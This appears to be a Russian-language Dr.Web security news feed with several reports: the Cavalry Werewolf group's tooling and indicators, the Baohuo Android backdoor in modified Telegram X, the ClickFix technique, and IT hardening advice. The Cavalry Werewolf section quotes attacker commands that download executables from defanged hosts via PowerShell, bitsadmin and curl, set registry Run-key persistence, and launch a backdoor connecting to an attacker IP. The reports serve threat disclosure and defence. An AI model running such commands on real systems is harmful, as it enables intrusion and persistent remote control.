7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram-бот	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram-бот	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram-бот	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

Характерные для группировки действия внутри скомпрометированной сети

После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.

Для получения информации о зараженном компьютере запускают команды:

whoami — получить сведения о текущем пользователе;
dir C:\\users\\<user>\\Downloads — получить список файлов в каталоге «Загрузки» текущего пользователя;
dir C:\\users\\public\\pictures\\ — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);
ipconfig /all — получить конфигурацию сети;
net user — получить список всех пользователей в системе.

Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

Для настройки параметров сети используют:

утилиту командной строки netsh, входящую в состав ОС Windows.

Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:

PowerShell (например: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
Bitsadmin (например: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
curl (например: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

Для закрепления в системе:

Могут модифицировать системный реестр Windows (например: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — для запуска BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — для запуска BackDoor.Tunnel.41.

Для удаления инструментов могут использовать PowerShell. Например:

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Злоумышленники также могут периодически проверять доступность С2-серверов через команду ping.

Особенности группировки Cavalry Werewolf

Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:

предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;
основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;
с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;
часто применяют Telegram API для управления зараженными компьютерами;
для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;
для загрузки последующих стадий заражения на целевое устройство используют директории C:\\users\\public\\pictures, C:\\users\\public\\libraries, C:\\users\\public\\downloads.

Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Матрица MITRE

Этап	Техника
Первоначальный доступ	Целевой фишинг с вложением (T1566.001)
Выполнение	Выполнение с участием пользователя (T1204) PowerShell (T1059.001) Командная оболочка Windows (T1059.003)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) BITS-задачи (T1197)
Повышение привилегий	Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	BITS-задачи (T1197)
Организация управления	Внешний прокси-сервер (T1090.002) Двусторонняя связь (T1102.002)
Эксфильтрация данных	Эксфильтрация по каналу управления (T1041) Эксфильтрация через веб-службу (T1567)

Индикаторы компрометации

Серый кардинал Baohuo. Android-бэкдор захватывает учетные записи Telegram, получая над ними полный контроль

Thu, 23 Oct 2025 12:15:33 GMT

23 октября 2025 года

Компания «Доктор Веб» выявила опасный бэкдор Android.Backdoor.Baohuo.1.origin в модифицированных злоумышленниками версиях мессенджера Telegram X. Помимо возможности похищать конфиденциальные данные, включая логин и пароль пользователя, а также историю переписки, это ВПО обладает рядом уникальных особенностей. Например, чтобы предотвратить свое обнаружение и скрыть факт компрометации учетной записи, Android.Backdoor.Baohuo.1.origin умеет скрывать в списке активных сеансов Telegram подключения со сторонних устройств. Кроме того, он может добавлять и исключать пользователя из Telegram-каналов, вступать от его лица в чаты и выходить из них, также скрывая эти действия. Фактически с его помощью злоумышленники получают полный контроль над учетной записью жертвы и функциями мессенджера, а сам троян является инструментом для накрутки числа подписчиков в Telegram-каналах. Киберпреступники управляют бэкдором в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. По оценкам наших специалистов общее число устройств, зараженных Android.Backdoor.Baohuo.1.origin, превысило 58 000.

Распространение Android.Backdoor.Baohuo.1.origin началось в середине 2024 года, о чем свидетельствуют найденные при его анализе более ранние модификации. Основным способом доставки бэкдора на целевые устройства является реклама внутри мобильных приложений. Потенциальным жертвам демонстрируются объявления, в которых предлагается установить мессенджер Telegram X. При нажатии на баннер пользователи перенаправляются на вредоносные сайты, с которых и происходит загрузка троянского APK.

Эти сайты оформлены в стиле магазина приложений, а сам мессенджер позиционируется на них как площадка для удобного поиска партнера для общения и свиданий. Об этом говорят как баннеры с наложенным на них рекламным текстом о «бесплатных видеочатах» и с приглашениями «поговорить» (например, под видом скриншотов окна видеовызова), так и сочиненные злоумышленниками отзывы якобы довольных пользователей. Отметим, что на веб-страницах предусмотрена возможность выбора языка оформления, однако сами изображения при этом не меняются.

Один из вредоносных сайтов, с которых загружается троянская версия Telegram X. Потенциальным жертвам предлагается установить программу, где согласно «отзывам», легко найти партнера для общения и свиданий

В настоящее время киберпреступники подготовили типовые шаблоны с баннерами только для двух языков: португальского с ориентиром на пользователей из Бразилии, а также индонезийского. Таким образом, жители Бразилии и Индонезии являются главной целью для атакующих. В то же время нельзя исключать, что со временем интерес злоумышленников распространится и на пользователей из других стран.

Изучение сетевой инфраструктуры атакующих позволило определить масштаб их деятельности. В среднем вирусные аналитики «Доктор Веб» наблюдают порядка 20 000 активных подключений Android.Backdoor.Baohuo.1.origin. При этом общее число зараженных устройств превысило 58 000. Заражению подверглись около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.

Страны с наибольшим числом устройств, зараженных Android.Backdoor.Baohuo.1.origin (по данным антивирусной лаборатории «Доктор Веб»)

Однако Android.Backdoor.Baohuo.1.origin распространяется не только через вредоносные сайты: наши специалисты обнаружили его и в сторонних каталогах Android-приложений — например, APKPure, ApkSum и AndroidP. При этом в магазине APKPure он размещен от имени официального разработчика мессенджера, несмотря на то, что цифровые подписи оригинала и троянской модификации отличаются. Мы уведомили онлайн-площадки, в которых были найдены троянские версии Telegram X.

Модифицированный Telegram X с внедренным Android.Backdoor.Baohuo.1.origin распространялся в APKPure от имени настоящего разработчика мессенджера

Антивирусная лаборатория «Доктор Веб» выявила несколько разновидностей Android.Backdoor.Baohuo.1.origin, которые условно можно разделить на 3 основные группы модификаций Telegram X:

версии, в которых злоумышленники встроили бэкдор в основной исполняемый DEX-файл мессенджера;
версии, в которых бэкдор в виде патча динамически внедряется в исполняемый DEX-файл при помощи утилиты LSPatch;
версии, в которых бэкдор находится в отдельном DEX-файле в каталоге с ресурсами программы и загружается динамически.

Независимо от типа модификации Android.Backdoor.Baohuo.1.origin инициализируется при запуске самого мессенджера. Тот остается работоспособным и для пользователей выглядит как обычная программа. Однако в действительности злоумышленники через бэкдор полностью его контролируют и даже могут изменять логику его работы.

Когда киберпреступникам необходимо выполнить действие, которое не требует вмешательства в основную функциональность программы, используются заранее подготовленные «зеркала» необходимых методов приложения. Например, с их помощью могут отображаться фишинговые сообщения в окнах, которые внешне не будут отличаться от настоящих окон Telegram X.

Методы — это отдельные блоки кода в структуре Android-приложений, которые отвечают за выполнение тех или иных задач.

Если же действие не является стандартным для программы, то используется фреймворк Xposed, который непосредственно меняет ту или иную функциональность мессенджера через динамическую модификацию методов. В частности, с его помощью скрываются определенные чаты и авторизованные устройства, а также перехватывается содержимое буфера обмена.

Основное отличие ранних версий вредоносного приложения от актуальных — в организации управления трояном. В старых модификациях связь со злоумышленниками и получение от них заданий реализованы традиционным способом — через C2-сервер. Однако со временем вирусописатели добавили в Android.Backdoor.Baohuo.1.origin возможность отправки дополнительных команд через базу данных Redis, расширив тем самым его функциональность и обеспечив двумя независимыми каналами управления. При этом они предусмотрели дублирование новых команд и через обычный C2-сервер на случай, если база окажется недоступной. Это первый известный факт применения Redis для управления вредоносным ПО для Android.

Во время запуска Android.Backdoor.Baohuo.1.origin соединяется с начальным C2-сервером для загрузки конфигурации, которая среди прочего содержит данные для подключения к Redis. Через эту базу данных злоумышленники не только отправляют определенные команды вредоносному приложению, но и обновляют настройки трояна. В том числе они назначают адрес текущего C2-сервера, а также NPS-сервера. Последний вирусописатели используют для подключения зараженных устройств к своей внутренней сети (интранету) и превращения их в прокси для выхода в интернет.

Android.Backdoor.Baohuo.1.origin периодически связывается с C2-сервером через API-вызовы и может получать следующие задания:

загрузить на C2-сервер входящие СМС и контакты из телефонной книги зараженного устройства;
отправить на сервер содержимое буфера обмена при сворачивании мессенджера и возвращении в его окно;
получить от C2-сервера интернет-адреса для демонстрации рекламы, а также адрес сервера для скачивания обновления трояна в виде исполняемого DEX-файла;
получить ключи шифрования, которые используются при отправке некоторых данных на C2-сервер — например, содержимого буфера обмена;
запросить группу команд на сбор информации об установленных на устройстве приложениях, истории сообщений, контактах из телефонной книги устройства и об устройствах, на которых выполнен вход в Telegram (запрос выполняется с интервалом в 30 минут);
запросить у C2-сервера ссылку для скачивания обновления Telegram X;
запросить у C2-сервера конфигурацию, которая сохраняется в виде JSON-файла;
запросить информацию о базе данных Redis;
загрузить на C2-сервер информацию об устройстве при каждой сетевой активности мессенджера;
получить с C2-сервера список ботов, которые затем добавляются в список контактов Telegram;
каждые 3 минуты передавать на сервер информацию о текущих разрешениях приложения, состоянии устройства (включен ли или выключен экран, активно ли приложение), а также номер мобильного телефона с именем и паролем от учетной записи Telegram;
каждую минуту запрашивать команды в формате, аналогичном командам от базы данных Redis.

Для получения команд через Redis Android.Backdoor.Baohuo.1.origin подключается к соответствующему серверу злоумышленников, где регистрирует свой подканал — к нему в дальнейшем подключаются киберпреступники. Они публикуют в нем задания, которые бэкдор затем исполняет. Вредоносная программа может получать следующие команды:

создать черный список чатов, которые не будут отображаться пользователю в окне Telegram X;
скрыть от пользователя заданные устройства в списке авторизованных для его учетной записи;
заблокировать на заданное время отображение уведомлений от чатов из созданного черного списка;
показать окно с информацией об обновлении приложения Telegram X — при нажатии на него пользователь перенаправляется на заданный сайт;
отправить на C2-сервер информацию обо всех установленных приложениях;
сбросить на зараженном устройстве текущую сессию авторизации пользователя в Telegram;
показать окно с информацией об обновлении приложения Telegram X, где пользователю предлагается установить APK-файл (если файл отсутствует, троян предварительно скачивает его);
убрать значок Telegram Premium в интерфейсе приложения у текущего пользователя;
загрузить на C2-сервер информацию из баз данных Telegram X, в которых хранится история чатов, сообщения и другие конфиденциальные данные;
подписать пользователя на заданный Telegram-канал;
покинуть заданный Telegram-канал;
вступить от лица пользователя в Telegram-чат по указанной ссылке;
получить список устройств, на которых выполнена авторизация в Telegram;
запросить получение токена аутентификации пользователя и передать его на С2-сервер.

Отметим, что перехват данных из буфера обмена, когда пользователь сворачивает мессенджер и снова возвращается в его окно, позволяет реализовывать различные сценарии кражи конфиденциальных данных. Например, жертва может скопировать пароль или мнемоническую фразу для входа в криптокошелек, текст важного документа для отправки бизнес-партнерам по почте и т. д., а троян перехватит оставшиеся в буфере данные и передаст злоумышленникам.

Dr.Web Security Space для мобильных устройств успешно обнаруживает и удаляет известные версии бэкдора Android.Backdoor.Baohuo.1.origin, поэтому для наших пользователей он опасности не представляет.

Подробнее об Android.Backdoor.Baohuo.1.origin
Индикаторы компрометации

Как работает атака ClickFix

Wed, 22 Oct 2025 10:45:13 GMT

Пользователи по всему миру встревожены ростом волны атак ClickFix. Это разновидность социальной инженерии, при которой злоумышленники обманом подталкивают пользователя к самостоятельному запуску вредоносного кода на устройстве.

Атака начинается с визита на взломанный или поддельный сайт, где отображается предупреждение: например, что страница некорректно отображается, произошла ошибка в браузере или требуется обновление.
На экране появляется кнопка — «Исправить», «Проверить» или «Обновить». При ее появлении в буфер обмена незаметно копируется вредоносный код, то есть даже не обязательно нажимать на кнопку — копирование автоматическое. Затем пользователю предлагают вставить этот код в командную строку или окно, кликнув «Выполнить». Как только он это делает — вредоносная программа запускается и устанавливается, зачастую без участия антивируса, потому что действия исходят от самого пользователя.

Ниже представлена имитация упрощенного варианта атаки ClickFix

Во время запуска и просмотра контента в браузере неожиданно для пользователя появляется предупреждение о том, что что-то пошло не так с отображением содержимого страницы, и ошибки связаны с недавним обновлением браузера.

Для решения пользователю предлагается выполнить ряд манипуляций по исправлению данной проблемы:

Нажать кнопку исправления «Fix it!»;
Нажать правой кнопкой мыши на иконку Windows;
В списке выбрать Windows PowerShell с правами администратора;
Правой кнопкой мыши вставить код и исполнить.

При нажатии кнопки в браузере незаметно для пользователя копируется вредоносный исполняемый скрипт с последующей вставкой его в терминал PowerShell и исполнением:

Скрипт создает удаленное соединение c инфраструктурой C2, которая позволяют злоумышленникам удаленно управлять скомпрометированными системами.
В данном случае создается соединение с удаленным хостом C2, скачивается полезная нагрузка в виде исполняемого файла на хост пользователя, который предназначен для модификации файла hosts и запускается механизм его активации с последующим завершением скрипта.

На этапе запуска вредоносного файла решения Dr.Web обнаруживают его с помощью системы превентивной защиты.

Еще один распространенный вариант атаки ClickFix — мимикрирование под капчу. На экране появляется якобы легитимная проверка, а в фоновом режиме вредоносный код копируется в буфер обмена. Такая маскировка увеличивает вероятность успешной атаки, заставляя пользователей невольно взаимодействовать с вредоносным контентом и при этом думать, что они просто подтверждают свою человечность.

Следом появляется инструкция по запуску кода.

Доверчивое выполнение всех шагов открывает злоумышленнику удаленный доступ к устройству: пользователь случайно запускает вредоносный скрипт.

Почему сложно обнаружить атаку ClickFix

Когда пользователь нажимает кнопку на вредоносном сайте, никакой угрозы антивирус пока не видит. Это связано с тем, что на первом этапе все действия кажутся вполне законными: пользователь сам копирует команды, сам их вставляет и запускает — как будто делает обычные системные операции.
Обнаружение происходит позже — когда запускается вредоносный файл или код пытается встроиться в другие процессы в системе. Именно в этот момент антивирус распознает угрозу и нейтрализует ее. То есть защита срабатывает уже на так называемой постэксплуатационной стадии, когда вредоносное ПО начинает активные действия: вмешивается в защищенные процессы или ведет себя необычно.
К этому времени злоумышленник, как правило, уже подключился к системе жертвы. Это значит, что основная вредоносная нагрузка (payload) доставлена, и она может маскироваться под обычные процессы.
На этом этапе атакующий способен:

углубить свое присутствие в системе (получить больше прав),
собирать данные,
перемещаться по сети,
пытаться отключить антивирусную защиту.

Дополнительно вредоносное ПО может быть зашифровано или запутано (обфусцировано), что делает его менее заметным для стандартных механизмов защиты.

Почему важно действовать на самых ранних этапах

На этом фоне становится особенно важным не только реагировать на угрозу после ее запуска, но и предотвращать подключение злоумышленника к системе. Для этого могут использоваться такие методы, как:

проверка содержимого буфера обмена, если в браузере появляются подозрительные сообщения с командами (например, PowerShell),
анализ сетевого трафика и попыток установить подозрительные соединения,
обучение пользователей методам распознавания социальной инженерии — с разбором реальных сценариев атак.

Практические рекомендации по усилению безопасности ИТ-инфраструктуры

Fri, 08 Aug 2025 13:06:15 GMT

08 августа 2025 года

Средства массовой информации почти ежедневно сообщают о кибератаках на различные организации.

Зачастую атаки злоумышленников сопровождаются не только кражей важных коммерческих данных, но и их последующим шифрованием, чтобы нанести максимальный вред компании.

Статистика «Доктор Веб»

С каждым годом все меньше случаев, когда удается криптоаналитическими методами подобрать ключ шифрования в случае инцидента с шифровальщиком. По нашей статистике, расшифровке поддаются около 1-2% случаев, с которыми к нам обращаются. Злоумышленники совершенствуют схемы и методы шифрования, используют исключительно надежные и криптостойкие алгоритмы. Как следствие, файлы становится невозможно расшифровать без получения уникальных криптостойких ключей, не поддающихся перебору за разумные периоды времени.

Иногда зашифрованные данные невозможно расшифровать в принципе. Происходит это по абсолютно разным причинам. Например, злоумышленники могут допускать ошибки в алгоритме шифрования или в коде своих изделий, как результат — при шифровании файлы повреждаются или даже стираются. Другой вариант: хакеры просто не выходят на связь, и становится невозможным получить ключ расшифровки. Нередки случаи, когда ключ удается выкупить у злоумышленников, но он не подходит для расшифровки или подходит только для части данных, тем временем сами вирусописатели перестают выходить на связь.

Напрашивается вывод: если данные уже зашифрованы преступником, то с высокой долей вероятности они потеряны безвозвратно, даже если пострадавший согласится заплатить выкуп. Нельзя забывать, что целью некоторых известных группировок является преднамеренное повреждение данных, а не вымогательство и получение за них выкупа. Необходимо принять меры к защите корпоративной сети от проникновения злоумышленников, меры для своевременного обнаружения такого вторжения, меры, препятствующие выполнению злоумышленником вредоносных действий. Они должны быть дополнены мерами, направленными на минимизацию нанесенного ущерба и быстрое восстановление информационной системы после подобного инцидента. Иными словами, необходимо со всей возможной тщательностью застраховаться на случай подобного киберинцидента.

По нашей статистике, наиболее частый и распространенный вектор атаки — несанкционированное получение удаленного доступа – причем последний может быть не только с помощью RDP, но и VNC или программы для удаленного управления (например, RAdmin, Ammyy Admin и пр.). Возможны разные способы получения этого доступа. Самый распространенный — это банальный подбор пароля или его утечка (через подкуп сотрудника, фишинг, намеренный саботаж или халатность). Реже встречается использование уязвимостей ОС или критичного софта, содержащего данные уязвимости (MS Exchange, MS SQL Server и т.д.). Еще реже — банальное скачивание вируса из внешней сети, в том числе через почтовый фишинг или другое несознательное действие.

Также следует иметь в виду, что многократное использование одинакового пароля для разных сервисов означает, что в случае его утечки компрометации подвергаются сразу все сервисы, где он используется. Именно с попыток перебора таких скомпрометированных паролей нередко начинаются сценарии проникновения злоумышленников в периметр организации. Иными словами, каждый используемый пароль должен быть уникальным: применяться только в одном сервисе и нигде более.

Особняком стоят целевые атаки на предприятия, когда могут применяться все вышеперечисленные методы вместе взятые. Иногда для целевой атаки на одну компанию злоумышленники совершают несанкционированный удаленный доступ в сеть других компаний, например, дочерней организации, поставщика услуг или партнера. Такой «заход» нужен, чтобы обеспечить доверие, а затем успешно осуществить фишинговую атаку и получить точку входа. В таких случаях само по себе заражение или шифрование — не самоцель. Злоумышленникам достаточно разместить в системе цели некий уязвимый драйвер или библиотеку, так называемую «закладку», через которую они впоследствии удаленно смогут получать интересующую информацию о сети компании, а также распространять своё влияние глубже. В таком режиме хакеры могут незамеченными находиться в сети предприятия месяцами или годами и не вести никакой явной вирусной деятельности. Однако, любой серьезный анализ или аудит критичных систем в этот период с большой степенью вероятности покажет присутствие незваных гостей.

На основе многолетнего опыта работы нашей службы технической поддержки и департамента по расшифровке файлов, мы разработали рекомендации для усиления безопасности ИТ-инфраструктуры на предприятиях.

Общие рекомендации

Скачать PDF

Главное: принципиально — провести аудит всей системы и определить основные критичные точки, без защиты которых компания не сможет существовать, а затем — сконцентрироваться на них в первую очередь.

Проведите ревизию учетных записей (УЗ) вашей сети. Заблокируйте все неиспользуемые УЗ. Для всех используемых административных УЗ поменяйте пароли или убедитесь, что установлен надежный пароль.
- Важно обеспечить сложность пароля. Главные требования к паролям всем известны: длина не менее 8 символов, с обязательным использованием букв разного регистра, цифр и специальных символов.
- Архиважно: пароль должен быть уникальным. Ни в коем случае он не должен был использоваться где-либо ранее: на сторонних сайтах или сервисах. Пользователи склонны использовать устоявшиеся пароли, но при этом не отслеживают своевременно все возможные утечки баз данных с паролями. Больше того, об этих утечках не всегда известно. А они происходят регулярно. Любой вполне надежный пароль, установленный пользователем на стороннем сервисе несколько месяцев назад, вполне может оказаться в одной из свежих украденных баз данных, что позволит злоумышленникам получить удаленный доступ. Вывод прост: лучше забыть и восстановить пароль, нежели подвергнуть компрометации всю сеть предприятия.
- Также может быть полезно использовать сервисы вроде Have I Been Pwned, если это не противоречит политике безопасности компании. Применение таких сервисов позволит выявлять случаи утечек паролей пользователей.
Проверьте степень защищенности доступа по протоколу RDP (Remote Desktop Protocol, протокол удалённого рабочего стола) или другого программного обеспечения для удаленного доступа (если они используются). На сегодня при наличии установленного и работающего в системе антивируса случаи шифрования файлов практически не встречаются. Самая распространенная схема — компрометация удаленного доступа, получение повышенных привилегий в системе, удаление антивируса или его отключение, за которыми следует запуск вспомогательных утилит и шифровальщика. То есть, речь идет о комплексных атаках с использованием различных техник.

Если в вашей организации используется RDP, то доступ к нему должен быть надежно защищен. Все учетные записи, которые используются для подключения, должны быть под контролем. В обязательном порядке они должны иметь длинный, уникальный и сложный пароль, который невозможно подобрать ни простым перебором, ни перебором по словарям. Все неактуальные учетные записи должны быть отключены.

Если это возможно, дополнительно RDP (а равно VNC и прочие способы удаленного подключения) канал стоит скрыть за VPN. Если это невозможно, то на внешнем оборудовании — роутере или шлюзе — необходимо настроить ограничение на удаленное подключение, оставив возможность подключаться удаленно только с определенных IP или подсетей. Также стоит рассмотреть лучшие практики по защите средств удаленного доступа от несанкционированного подключения. Включение и просмотр аудита удаленных подключений, ограничение числа подключений при неудачном вводе пароля более определенного числа раз и замена стандартного порта заметно осложнят злоумышленникам процесс и заметно снизят вероятность успешного входа.

Нужно осознавать: при компрометации удаленного доступа система практически обречена. И ни один антивирус уже не сможет полноценно защитить систему и сеть предприятия от последствий. При инцидентах такого рода злоумышленники чаще всего удаляют антивирус или выводят его из строя. Но иногда хакеры могут не использовать никаких вредоносных утилит, чтобы похитить и затем зашифровать данные. В этом случае им не придется удалять антивирус, так как невозможно будет отличить злонамеренные действия от действий легитимного администратора. Нередки случаи, когда при подобных инцидентах файлы либо упаковываются в обычные архивы с длинным неизвестным паролем, либо скачиваются на внешние серверы, а оригиналы из системы полностью удаляются. Также для шифрования могут использоваться системные средства, такие, как Windows Bitlocker. В последнем случае никаких вредоносных действий относительно системы и антивируса не выполняется в принципе, только стандартные пользовательские или административные операции. Еще один вывод: к обеспечению информационной безопасности компании необходимо подходить комплексно.
Проверьте настройку удаленного доступа к серверам Linux и выполните основные рекомендации по настройкам SSHD:
- Запретите использование входа по паролю — применяйте только SSH ключи, сами ключи при этом защищайте паролем (В принципе, ключ можно сохранить без пароля и подключаться по нему далее без пароля. Но мы не рекомендуем этот способ). Ключи лучше хранить на внешнем носителе информации и подключать к компьютеру по необходимости.
- Запретите возможность непосредственного входа по SSH под учетной записью root. При необходимости повышения привилегий в пользовательской сессии используйте sudo.
- Ограничьте перечень пользователей, имеющих право подключения по SSH.
- На уровне системного межсетевого экрана установите — по умолчанию — для всех подключений политику на отклонение входящих подключений. Избранные порты должны быть открыты для подключений только в случае необходимости. Разрешить для подключений из общей сети только публичные сервисы (например, http/https, smtp). Чувствительные сервисы (например, SSH) нужно ограничивать подключениями через VPN.
- Для любых сервисов типа СУБД (mysql, postresql, redis, mongodb и т.п.) исключите возможность подключения с внешних адресов. Эти подключения должны осуществляться строго с доверенных адресов (локальная сеть или VPN).
- Избегайте настроек сервисов, открывающих входящие подключения на интерфейсе 0.0.0.0. Это допустимо только для публичных сервисов, для всех иных должен использоваться непубличный интерфейс (локальная сеть или VPN).
- Включите аудит действий пользователей (auditd) и настройте уведомление об активности root или sudo — например, через отправку на электронную почту.
- Ограничьте возможность выполнения скриптов в /tmp и других временных каталогов через параметры монтирования noexec, nosuid, nodev – однако следует помнить, что такие ограничения могут оказать влияние на легитимные процессы (например, установщики прикладного ПО), поэтому нужно быть внимательным при применении данной рекомендации.
- Разнесите системные каталоги по разным разделам (/var, /home, /tmp) для ограничения последствий при их переполнении.
- Удалите все неиспользуемые сервисы, установленные из шаблона ОС (telnet, ftp, rsh, nfs и т.д.). Ненужные службы, которые не удалены, отключите (systemctl disable или иным аналогичным способом).
- Ограничьте использование sudo только разрешенными пользователями (настройкой sudoers).
- Рассмотрите возможность использования дополнительных методов аутентификации по SSH, таких, как Google Authenticator или аналоги. Любой 2FA метод многократно снизит риск несанкционированного подключения.
Проверьте саму систему и критичное ПО на известные уязвимости. По возможности используйте наиболее актуальные сборки операционной системы (ОС) и прикладного ПО. Установите все последние обновления к ним.

Эксплойты операционной системы и широко распространенного софта могут являться лазейкой для получения доступа к системе в обход любых методов защиты. Чем старее парк используемых ОС, тем выше риск компрометации. Для современных ОС, в первую очередь, всегда должно быть включено автоматическое обновление. Но главное: это обновление должно на деле проводиться. Это касается любого критичного софта, как, например, различных СУБД, почтовых серверов и клиентов, ПО для проектирования, моделирования, или любого другого. Обновления должны быть плановыми и систематическими, чтобы выход очередной 0-day уязвимости не застал пользователей врасплох и не стал причиной компрометации всей сети в обход любого антивирусного ПО.
Защитите антивирус от удаления и обновите его до актуальной версии.

Антивирусное ПО должно быть установлено на всех машинах сети. Сегодня практически не встречаются случаи, когда при установлении антивируса вместе с ним в систему был успешно занесен и запущен троян-шифровальщик. Первое, что делают злоумышленники при удаленном проникновении в систему – пытаются отключить, удалить или иначе вывести из строя любое антивирусное ПО. Везде, где это возможно, необходимо установить запрет на удаление антивируса локально (если используется версия антивируса Dr.Web с централизованным управлением), запрет на отключение самозащиты (также если используется версия антивируса Dr.Web с централизованным управлением) и пароль для доступа к его настройкам. В случае компрометации удаленного подключения такие ограничения повышают шансы успешно защититься и осложняют задачу злоумышленникам, давая администраторам время среагировать на атаку.

Любая рабочая станция без антивируса или с антивирусом, в котором не обновляются компоненты и базы, создает опасность для всей остальной сети. Особенно, если эта машина доступна из внешней сети.

При использовании централизованных версий антивируса Dr.Web под Windows так же рекомендуется рассмотреть возможность использования Контроля приложений, входящего в состав центра управления Dr.Web и антивирусных агентов, начиная с 12 версии. При корректной настройке, в системе в принципе невозможен будет запуск любых действий не авторизованных администратором.
Регламентируйте проведение процедуры регулярного резервного копирования (бэкапа). Это наиважнейший принцип защиты. Правильно организованная система резервного копирования является основным средством защиты как от шифровальщиков, так и от других проблем, связанных с повреждением данных и выходом оборудования из строя. Серьезная ошибка, которую допускают многие администраторы в реальных инцидентах — хранение резервных копий в той же сети или системе, в которой эти копии создаются. Недостаточно просто сделать резервную копию одной системы на некоем соседнем сервере, без дополнительных манипуляций. При киберинциденте, и, в частности, при шифровании данных, с высокой степенью вероятностью эти резервные копии окажутся зашифрованными наряду со всеми остальными данными в системе. Именно такое течение инцидентов мы и видим на практике в обращениях пользователей, которые до нас доходят. При шифровании данных, бэкапы в сети — одна из первых целей злоумышленников.

Резервное копирование ценной информации должно выполняться на носители, которые недоступны для записи из основных систем, где хранятся оригиналы. Ни с одной рабочей станции в сети не должно быть одновременного доступа к записи и чтению всех существующих бэкапов. В любой момент времени должно существовать хотя бы две, а лучше три резервные копии корпоративных данных, без которых предприятие не сможет функционировать. Как минимум одна из этих копий должна быть полностью изолирована от остальной сети. В план резервного копирования обязательно нужно добавлять периодическую проверку восстановления из резервной копии. То есть, резервная копия не только должна просто существовать, но должна быть целостной, а администраторы должны иметь возможность и практический навык по быстрому восстановлению работоспособности сети из данного бэкапа. При применении такого протокола, во-первых, в критической ситуации персонал будет иметь натренированный опыт данной операции, что заметно сократит период восстановления, а, во-вторых, позволит избежать ситуации, когда ввиду некорректной настройки параметров данные из резервной копии невозможно восстановить.
Мы настоятельно рекомендуем разработать план аварийного восстановления и периодически устраивать учения. Персонал должен иметь инструкции на случай возникновения недопустимых последствий, а руководитель должен быть уверен в том, что этот план жизнеспособен.

Из практики нам известно, что организация полноценной автоматизированной системы резервного копирования может быть сопряжена с рядом трудностей. Однако, нельзя полностью игнорировать эту процедуру, так как добиться результата можно и с использованием минимальных средств. Даже банальное ручное копирование бухгалтерской 1С базы и ряда важных документов на usb-накопитель, пусть даже раз в неделю, многократно снизит возможные финансовые, правовые и репутационные последствия от потери всей совокупности данных.

Геймерам приготовиться: под видом читов и модов мошенники распространяют Trojan.Scavenger для кражи криптовалюты и паролей

Tue, 22 Jul 2025 02:00:00 GMT

22 июля 2025 года

Антивирусная лаборатория «Доктор Веб» обнаружила семейство вредоносных программ Trojan.Scavenger, с помощью которых злоумышленники похищают конфиденциальные данные из криптокошельков и менеджеров паролей у пользователей ОС Windows. В заражении компьютеров участвует несколько троянов семейства, при этом для их запуска используются легитимные приложения, в том числе в них эксплуатируются уязвимости класса DLL Search Order Hijacking.

Введение

